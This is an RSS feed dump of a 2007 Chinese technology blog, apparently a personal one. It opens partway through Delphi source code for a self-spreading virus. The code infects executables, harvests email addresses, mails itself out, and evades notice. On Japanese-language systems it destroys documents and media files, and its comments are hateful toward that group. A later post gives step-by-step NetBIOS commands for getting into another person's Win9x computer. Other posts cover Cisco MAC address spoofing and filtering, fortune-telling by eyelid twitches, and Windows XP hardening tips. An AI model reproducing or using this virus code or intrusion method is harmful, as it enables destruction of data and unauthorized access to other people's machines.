sp;&lt;&gt;&nbsp;'..')&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;result&nbsp;:=&nbsp;0&nbsp;//不是目录<br>&nbsp;&nbsp;else&nbsp;if&nbsp;(searchrec.attr&nbsp;=&nbsp;16)&nbsp;and&nbsp;(searchrec.name&nbsp;&lt;&gt;&nbsp;'.')&nbsp;and<br>&nbsp;&nbsp;&nbsp;&nbsp;(searchrec.name&nbsp;&lt;&gt;&nbsp;'..')&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;result&nbsp;:=&nbsp;1&nbsp;//不是根目录<br>&nbsp;&nbsp;else&nbsp;result&nbsp;:=&nbsp;2;&nbsp;//是根目录<br>end;<br>begin<br>if&nbsp;(findfirst(path&nbsp;+&nbsp;mask,&nbsp;faanyfile,&nbsp;searchrec)&nbsp;=&nbsp;0)&nbsp;then<br>begin<br>&nbsp;&nbsp;repeat<br>&nbsp;&nbsp;&nbsp;&nbsp;peekmessage(msg,&nbsp;0,&nbsp;0,&nbsp;0,&nbsp;pm_remove);&nbsp;//调整消息队列，避免引起怀疑<br>&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;isvaliddir(searchrec)&nbsp;=&nbsp;0&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;fn&nbsp;:=&nbsp;path&nbsp;+&nbsp;searchrec.name;<br>&nbsp;&nbsp;&nbsp;&nbsp;ext&nbsp;:=&nbsp;uppercase(extractfileext(fn));<br>&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(ext&nbsp;=&nbsp;'.exe')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.scr')&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;infectonefile(fn);&nbsp;//感染可执行文件&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;end<br>&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;if&nbsp;(ext&nbsp;=&nbsp;'.htm')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.html')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.asp')&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//感染html和asp文件，将base64编码后的病毒写入<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//感染浏览此网页的所有用户<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//哪位大兄弟愿意完成之？<br>&nbsp;&nbsp;&nbsp;&nbsp;end<br>&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;if&nbsp;ext&nbsp;=&nbsp;'.wab'&nbsp;then&nbsp;//outlook地址簿文件<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//获取outlook邮件地址<br>&nbsp;&nbsp;&nbsp;&nbsp;end<br>&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;if&nbsp;ext&nbsp;=&nbsp;'.adc'&nbsp;then&nbsp;//foxmail地址自动完成文件<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//获取foxmail邮件地址<br>&nbsp;&nbsp;&nbsp;&nbsp;end<br>&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;if&nbsp;ext&nbsp;=&nbsp;'ind'&nbsp;then&nbsp;//foxmail地址簿文件<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//获取foxmail邮件地址<br>&nbsp;&nbsp;&nbsp;&nbsp;end<br>&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;isjap&nbsp;then&nbsp;//是倭文操作系统<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;begin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(ext&nbsp;=&nbsp;'.doc')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.xls')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.mdb')&nbsp;or<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ext&nbsp;=&nbsp;'.mp3')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.rm')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.ra')&nbsp;or<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ext&nbsp;=&nbsp;'.wma')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.zip')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.rar')&nbsp;or<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ext&nbsp;=&nbsp;'.mpeg')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.asf')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.jpg')&nbsp;or<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ext&nbsp;=&nbsp;'.jpeg')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.gif')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.swf')&nbsp;or<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ext&nbsp;=&nbsp;'.pdf')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.chm')&nbsp;or&nbsp;(ext&nbsp;=&nbsp;'.avi')&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;smashfile(fn);&nbsp;//摧毁文件<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;&nbsp;&nbsp;end;<br>&nbsp;&nbsp;&nbsp;&nbsp;//感染或删除一个文件后睡眠200毫秒，避免cpu占用率过高引起怀疑<br>&nbsp;&nbsp;&nbsp;&nbsp;sleep(200);<br>&nbsp;&nbsp;until&nbsp;(findnext(searchrec)&nbsp;&lt;&gt;&nbsp;0);<br>end;<br>findclose(searchrec);<br>subdir&nbsp;:=&nbsp;tstringlist.create;<br>if&nbsp;(findfirst(path&nbsp;+&nbsp;'*.*',&nbsp;fadirectory,&nbsp;searchrec)&nbsp;=&nbsp;0)&nbsp;then<br>begin<br>&nbsp;&nbsp;repeat<br>&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;isvaliddir(searchrec)&nbsp;=&nbsp;1&nbsp;then<br>&nbsp;&nbsp;&nbsp;&nbsp;subdir.add(searchrec.name);<br>&nbsp;&nbsp;until&nbsp;(findnext(searchrec)&nbsp;&lt;&gt;&nbsp;0);<br>&nbsp;&nbsp;end;<br>findclose(searchrec);<br>count&nbsp;:=&nbsp;subdir.count&nbsp;-&nbsp;1;<br>for&nbsp;i&nbsp;:=&nbsp;0&nbsp;to&nbsp;count&nbsp;do<br>&nbsp;&nbsp;loopfiles(path&nbsp;+&nbsp;subdir.strings&nbsp;+&nbsp;'\',&nbsp;mask);<br>freeandnil(subdir);<br>end;<br>{&nbsp;遍历磁盘上所有的文件&nbsp;}<br>procedure&nbsp;infectfiles;<br>var<br>driverlist:&nbsp;string;<br>i,&nbsp;len:&nbsp;integer;<br>begin<br>if&nbsp;getacp&nbsp;=&nbsp;932&nbsp;then&nbsp;//日文操作系统<br>&nbsp;&nbsp;isjap&nbsp;:=&nbsp;true;&nbsp;//去死吧！<br>driverlist&nbsp;:=&nbsp;getdrives;&nbsp;//得到可写的磁盘列表<br>len&nbsp;:=&nbsp;length(driverlist);<br>while&nbsp;true&nbsp;do&nbsp;//死循环<br>begin<br>&nbsp;&nbsp;for&nbsp;i&nbsp;:=&nbsp;len&nbsp;downto&nbsp;1&nbsp;do&nbsp;//遍历每个磁盘驱动器<br>&nbsp;&nbsp;&nbsp;&nbsp;loopfiles(driverlist&nbsp;+&nbsp;':\',&nbsp;'*.*');&nbsp;//感染之<br>&nbsp;&nbsp;sendmail;&nbsp;//发带毒邮件<br>&nbsp;&nbsp;sleep(1000&nbsp;*&nbsp;60&nbsp;*&nbsp;5);&nbsp;//睡眠5分钟<br>end;<br>end;<br>{&nbsp;主程序开始&nbsp;}<br>begin<br>if&nbsp;iswin9x&nbsp;then&nbsp;//是win9x<br>&nbsp;&nbsp;registerserviceprocess(getcurrentprocessid,&nbsp;1)&nbsp;//注册为服务进程<br>else&nbsp;//winnt<br>begin<br>&nbsp;&nbsp;//远程线程映射到explorer进程<br>&nbsp;&nbsp;//哪位兄台愿意完成之？<br>end;<br>//如果是原始病毒体自己<br>if&nbsp;comparetext(extractfilename(paramstr(0)),&nbsp;'japussy.exe')&nbsp;=&nbsp;0&nbsp;then<br>&nbsp;&nbsp;infectfiles&nbsp;//感染和发邮件<br>else&nbsp;//已寄生于宿主程序上了，开始工作<br>begin<br>&nbsp;&nbsp;tmpfile&nbsp;:=&nbsp;paramstr(0);&nbsp;//创建临时文件<br>&nbsp;&nbsp;delete(tmpfile,&nbsp;length(tmpfile)&nbsp;-&nbsp;4,&nbsp;4);<br>&nbsp;&nbsp;tmpfile&nbsp;:=&nbsp;tmpfile&nbsp;+&nbsp;#32&nbsp;+&nbsp;'.exe';&nbsp;//真正的宿主文件，多一个空格<br>&nbsp;&nbsp;extractfile(tmpfile);&nbsp;//分离之<br>&nbsp;&nbsp;fillstartupinfo(si,&nbsp;sw_showdefault);<br>&nbsp;&nbsp;createprocess(pchar(tmpfile),&nbsp;pchar(tmpfile),&nbsp;nil,&nbsp;nil,&nbsp;true,<br>&nbsp;&nbsp;&nbsp;&nbsp;0,&nbsp;nil,&nbsp;'.',&nbsp;si,&nbsp;pi);&nbsp;//创建新进程运行之<br>&nbsp;&nbsp;infectfiles;&nbsp;//感染和发邮件<br>end;<br>end.</span> 
<img src ="http://www.cnitblog.com/yiye/aggbug/27417.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-21 22:51 <a href="http://www.cnitblog.com/yiye/archive/2007/05/21/27417.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>以太网MAC地址的获取更改应用 </title><link>http://www.cnitblog.com/yiye/archive/2007/05/21/27416.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Mon, 21 May 2007 14:50:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/21/27416.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27416.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/21/27416.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27416.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27416.html</trackback:ping><description><![CDATA[<div>
<p style="TEXT-INDENT: 2em">以太网mac地址唯一地标识了世界上的每个以太网设备。每一个生产网络设备的厂商都要将mac地址预先写进其设备中（如：以太网网卡，路由器，交换机等）。各种媒体已有很多文章介绍获得mac地址的方法。今天我们主要讨论怎样在cisco的ios获得、改变mac地址，并使用mac地址进行网络通信过滤。
<p style="TEXT-INDENT: 2em">
<p style="TEXT-INDENT: 2em"><strong>获得mac地址</strong>
<p style="TEXT-INDENT: 2em">在交换机的命令输入窗口，输入&#8220;show mac-address-table&#8221;可以获得mac地址表，例如：
<p style="TEXT-INDENT: 2em">
<center><ccid_nobr>
<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1>
    <tbody>
        <tr>
            <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
            <pre><ccid_code>switch# show mac-address-table
            mac address table
            -------------------------------------------
            vlan    mac address       type        ports
            ----    -----------       --------    -----
            all    0014.1c40.b080    static      cpu
            all    0100.0ccc.cccc    static      cpu
            all    0100.0ccc.cccd    static      cpu
            all    0100.0cdd.dddd    static      cpu
            1    000f.1fd3.d85a    dynamic     fa0/14</ccid_code></pre>
            </td>
        </tr>
    </tbody>
</table>
</ccid_nobr></center><br>在思科路由器上，可以使用&#8220;show interfaces&#8221;来查看mac地址。例如：
<p style="TEXT-INDENT: 2em">
<center><ccid_nobr>
<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1>
    <tbody>
        <tr>
            <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
            <pre><ccid_code>routerb# show interfaces
            ethernet0/0 is up, line protocol is up
            hardware is amdp2, address is 0003.e39b.9220 (bia 0003.e39b.9220)
            internet address is 1.1.1.1/8</ccid_code></pre>
            </td>
        </tr>
    </tbody>
</table>
</ccid_nobr></center><br>在第二行，可以看到：&#8220;bia 0003.e39b.9220&#8221;，bia即&#8220;烧录地址&#8221;（burned in address），mac地址即0003.e39b.9220。
<p style="TEXT-INDENT: 2em">
<p style="TEXT-INDENT: 2em"><strong>改变mac地址</strong>
<p style="TEXT-INDENT: 2em">
<p style="TEXT-INDENT: 2em">改变mac地址实质上其否定含义就是mac欺骗。特别是对于无线网络的攻击，改变mac地址是常用的方法。改变mac地址也可以用于合法的用途，如测试mac过滤。
<p style="TEXT-INDENT: 2em">
<p style="TEXT-INDENT: 2em">要改变设备在路由器上的mac地址，需在interface configuration mode（界面配置模式）下，使用&#8220;mac &#8211;地址&#8221;命令。例如：
<p style="TEXT-INDENT: 2em">
<center><ccid_nobr>
<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1>
    <tbody>
        <tr>
            <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
            <pre><ccid_code>routerb# conf t
            enter configuration commands, one per line.  end with cntl/z.
            routerb(config)# int e0/0
            routerb(config-if)# mac-address 0000.0000.0001
            routerb(config-if)#^z
            routerb#
            routerb# show int e0/0
            ethernet0/0 is up, line protocol is up
            hardware is amdp2, address is 0000.0000.0001 (bia 0003.e39b.9220)
            internet address is 1.1.1.1/8</ccid_code></pre>
            </td>
        </tr>
    </tbody>
</table>
</ccid_nobr></center><br>在改变mac地址以后，可以使用show interface命令来查看新的地址。
<p style="TEXT-INDENT: 2em">
<p style="TEXT-INDENT: 2em"><strong>基于mac地址的通信过滤</strong>
<p style="TEXT-INDENT: 2em">
<p style="TEXT-INDENT: 2em">通过协议分析仪，可以发现一些网络中某些设备非正常的数据通信。例如，某设备通过多个ip地址发送数据包。
<p style="TEXT-INDENT: 2em">这种情况，可以使用show mac-address-table命令来查看它所使用的交换机端口，并可以关闭此端口。但是，如果此端口连接的是一个集线器，而集线器又连接了许多其它设备那该怎么办呢？
<p style="TEXT-INDENT: 2em">有一个方法便是使用mac地址过滤来对路由器或交换机的数据通信进行过滤。下面是一个例子：
<p style="TEXT-INDENT: 2em">
<center><ccid_nobr>
<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1>
    <tbody>
        <tr>
            <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
            <pre><ccid_code>cat3750switch(config)# mac access-list ext filtermac
            cat3750switch(config-ext-macl)# deny host 0000.0000.0001 any
            cat3750switch(config-ext-macl)# permit any any
            cat3750switch(config-ext-macl)# exit
            cat3750switch(config)# int g1/0/40
            cat3750switch(config-if)# mac access-group filtermac in</ccid_code></pre>
            </td>
        </tr>
    </tbody>
</table>
</ccid_nobr></center><br>此命令在cisco catalyst 3750 gigabit ethernet switch交换机上完成。我们创建了一个名为&#8220;filtermac&#8221;的acl（访问控制表）。这个acl拒绝了与源地址为0000.0000.0001（十六进制非二进制）的所有数据通信，但是却允许其它地址的数据通信。将这个acl运用到界面1/0/40，这就防止了拥有这个mac地址的设备与本端口的数据通信，而不管它的ip地址是什么。
<p style="TEXT-INDENT: 2em">但是，不管怎么说，mac地址过滤并非安全措施，因为他人可以轻易地改变mac地址。 </p>
</div>
<img src ="http://www.cnitblog.com/yiye/aggbug/27416.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-21 22:50 <a href="http://www.cnitblog.com/yiye/archive/2007/05/21/27416.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>左吉右凶？眼皮跳大占卜</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27333.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 13:28:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27333.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27333.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27333.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27333.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27333.html</trackback:ping><description><![CDATA[<font face=Verdana><strong>子时：23点——01点前<br><br></strong>　　左眼：意外之喜降临，会有不错好运，你的心脏要强一点，别兴奋过了头。<br>　　右眼：有人请你吃饭，可 </font>
<table align=left>
    <tbody>
        <tr>
            <td><span id=adv_div_default style="DISPLAY: none"><font face=Verdana></font></span></td>
        </tr>
    </tbody>
</table>
以省下一笔钱，但是这个人的目的不明，你要多多斟酌。<font face=Verdana>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 丑时：01点——03点前</strong><br><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：家中最近很麻烦，大小事困扰着，不知该怎么办，短期内一筹莫展。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：有人思念你，有可能是家中长辈，相互牵挂太久了，有空打电话关心一下吧。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 寅时：03点——05点前</strong><br><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：会有朋友自远方而来，狠狠吃你一顿！如果你并非别有所图或手边闲钱多，接到朋友电话一定要装忙。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：家人有机会得到意外之财，例如忽然中了奖，也有可能丢掉的钱又找回来了。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 卯时：05点——07点前</strong><br><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：贵人贵客报到，让你生命重现曙光，多留意忽然出现在你身边；很久不见的朋友。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：平安顺利，不必太过担心可能发生危险的状况，吉人自有天相，安心睡觉吧。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 辰时：07点——09点前<br></strong><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：人际关系会变好，许久不见的朋友再次相逢，可能捎来不错的喜讯。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：钱财就这样不知不觉地流失掉，花了许多冤枉钱。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 巳时：09点——11点前</strong><br><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：会有好处可以捞，目前的你颇有利用价值，别人都会让你三分。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：开车小心，提醒家人多注意平安，危险出现在四周。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 午时：11点——13点前</strong><br><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：长期耕耘总算有了结果，你可以松一口气，准备享受成果吧。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：意料之外的事情发生，还好机率不高，继续保持警戒才好。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 未时：13点——15点前<br></strong><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：你可能在打赌或玩麻将时输了不少钱，别输光了才来后悔。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：有好事发生，但属于微不足道，你也不会很高兴的那种小事。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 申时：15点——17点前</strong><br>&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：忽然想起什么事情吗？快点去做，当下想到的，最容易成功了。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：异性缘佳，你的贵人就是异性，他们对你，比同性宽容多了。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 酉时：17点——19点前</strong><br><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：为人辛苦为人忙，好在有收获，帮别人也是在帮自己。<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：刚认识的朋友就可以熟得不得了，和他们多混熟点会很不错。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp; 戌时：19点——21点前</strong><br><br>&nbsp;&nbsp;&nbsp;&nbsp; 左眼：有人指派工作给你，不要想太多，快点答应，其他的问题会自然会迎刃而解喔！<br>&nbsp;&nbsp;&nbsp;&nbsp; 右眼：得意忘形了吗？小心小人随时准备落井下石，你别太嚣张。</p>
<p><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;亥时：21点——23点前</strong><br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;左眼：享受合家团圆、多方肯定，再加把劲，你会做得更漂亮。<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;右眼：提防官司纠纷，你要不口舌冒犯人，要不就是弄坏东西！</p>
</font><script language=javascript>
try
{
showAd(3,0,1);
}
catch(ex){}
</script><!--/enpcontent-->
<img src ="http://www.cnitblog.com/yiye/aggbug/27333.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 21:28 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27333.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>知道对方IP入侵别人的电脑</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27322.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:09:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27322.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27322.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27322.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27322.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27322.html</trackback:ping><description><![CDATA[黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。 现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法: <br>1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。
<p>&nbsp;</p>
<p>2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。</p>
<p>3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 </p>
<p>4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 </p>
<p>5.开DOS窗口键入 NBTSTAT -R </p>
<p>6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。</p>
<p>以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。<br></p>
<p>&nbsp;</p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27322.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:09 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27322.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>入侵WinXP常用七大招数</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27320.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:08:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27320.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27320.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27320.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27320.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27320.html</trackback:ping><description><![CDATA[<p>本文讲述了<a href="http://www.nohack.cn/" target=_blank>黑客</a>入侵Windows XP操作系统常用的七种方法，如果大家遇到类似那可要注意了&#8230;&#8230; </p>
<p>第一招：屏幕保护 </p>
<p>在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统就会自动启动屏幕保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，不知道密码的用户将无法进入工作状态，从而保护了数据的<a href="http://www.nohack.cn/" target=_blank>安全</a>。 </p>
<p>提示：部分设计不完善的屏幕保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>没有屏蔽系统的&#8220;Ctrl+Alt+Del&#8221;的组合键，因此需要设置完成之后测试一下<a href="http://www.nohack.cn/code/" target=_blank>程序</a>是否存在这个重大Bug。 </p>
<p>不过，屏幕保护最快只能在用户离开1分钟之后自动启动，难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开Windows安装目录里面的system子目录，然后找到相应的屏幕保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>(扩展名是SCR)，按住鼠标右键将它们拖曳到桌面上，选择弹出菜单中的&#8220;在当前位置创建快捷方式&#8221;命令，在桌面上为这些屏幕保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>建立一个快捷方式。 </p>
<p>此后，我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。 </p>
<p>第二招：巧妙隐藏硬盘 </p>
<p>在&#8220;按Web页&#8221;查看方式下，进入Windows目录时都会弹出一句警告信息，告诉你这是系统文件夹如果&#8220;修改该文件夹的内容可能导致<a href="http://www.nohack.cn/code/" target=_blank>程序</a>运行不正常，要查看该文件夹的内容，请单击显示文件&#8221;，这时单击&#8220;显示文件&#8221;就可以进入该目录了。 </p>
<p>原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件，之前必须在文件夹选项中单击&#8220;查看&#8221;标签，选择&#8220;显示所有文件&#8221;，这样就可以看见这两个文件了)。再按&#8220;F5&#8221;键刷新一下，看看发生了什么，是不是和进入Windows目录时一样。 </p>
<p>接下来我们用&#8220;记事本&#8221;打开folder.htt，这是用HTML语言编写的一个文件，发挥你的想像力尽情地修改吧。 </p>
<p>如果你不懂HTML语言也没关系，先找到&#8220;显示文件&#8221;将其删除，找到&#8220;修改该文件夹的内可能导致<a href="http://www.nohack.cn/code/" target=_blank>程序</a>运行不正常，要查看该文件夹的内容，请单击显示文件&#8221;，将其改为自己喜欢的文字，例如&#8220;<a href="http://www.nohack.cn/" target=_blank>安全</a>重地，闲杂人等请速离开&#8221;。 </p>
<p>将&#8220;要查看该文件夹的内容，请单击&#8221;改为&#8220;否则，后果自负!&#8221;，接着向下拖动滑块到倒数第9行，找到&#8220;(file：//%TEMPLATEDIR% /wvlogo.gif)&#8221;这是显示警告信息时窗口右下角齿轮图片的路径，将其改为自己图片的路径，例如用&#8220;d: /tupian/tupian1.jpg&#8221;替换&#8220;//&#8221;后面的内容，记住这里必须将图片的后缀名打出，否则将显示不出图片。 </p>
<p>当然，你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果，然后只要将原文件拷贝到下面这段文字的后面，覆盖掉原文件中&#8220;～&#8221;之间的内容就可以了。 </p>
<p><br>*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0<br>*usingthefile%THISDIRPATH%/folder.htt.<br>&nbsp;</p>
<p>保存并退出，按&#8220;F5&#8221;键刷新一下，是不是很有个性?接下来要作的就是用&#8220;超级兔子&#8221;将你所要的驱动器隐藏起来，不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的，就是干脆将folder.htt原文件中&#8220;～&#8221;之间的内容全部删除，这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象，使其中的文件更<a href="http://www.nohack.cn/" target=_blank>安全</a>。 </p>
<p>第三招：禁用&#8220;开始&#8221;菜单命令 </p>
